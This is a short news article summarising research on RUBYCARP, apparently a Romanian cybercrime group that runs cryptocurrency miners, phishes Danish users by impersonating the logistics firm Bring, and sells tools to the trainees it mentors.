A recent research study has uncovered and detailed the decade-long activities of a Romanian cyber threat group, RUBYCARP, which uses cryptocurrency mining and phishing techniques. Based on reports, the primary feature that the cybercriminal campaign exploits is the threat actors’ use of a script that could simultaneously deploy multiple cryptocurrency miners.
By executing these miners at once, RUBYCARP reduces both the time required for the attack and the chances of detection. The script primarily targets XMRig/Monero miners and was previously hosted on a now-defunct domain, “download[.]c3bash[.]org.”
Further evidence shows that RUBYCARP also conducts phishing operations to steal valuable financial assets, including credit card numbers.
The RUBYCARP threat group has executed a phishing campaign that targeted Danish users.
According to investigations, the RUBYCARP threat group utilised a phishing template and impersonated the logistics company Bring to target Danish users. Moreover, researchers identified a PHP script named “ini.inc,” which the hackers used as a tool for sending these phishing emails, with compromised email accounts linked to the attacks.
Further analysis of the group’s activities also observed various tools and techniques, including using specific commands within shell bot code to send phishing emails. The researchers also found evidence of a potential phishing landing page targeting European entities, including Swish Bank and Nets Bank.
The study also highlights RUBYCARP’s involvement in developing and selling cyber weapons. Separate research also explained that attribution for these campaigns became difficult. Still, the attackers are most likely Romanian and may have some affiliation with the ‘Outlaw APT’ group and others who leverage the Perl ShellBot. Furthermore, these researchers claimed that the threat actors are also involved in developing and selling cybercriminal tools.
Security experts say communication among threat actors has remained generally consistent over the years. Additionally, the community dynamic within RUBYCARP is noteworthy, as it involves mentoring newbies within the cybercriminal community. This tactic also offers financial advantages to the group, as it can later sell the toolset to their trainees while tutoring them.
The cooperativeness of some threat actors alongside other groups has been an integral part of their cybercriminal activities. This teamwork should remind organisations and threat researchers that helping one another will benefit everyone in preventing such malicious attacks.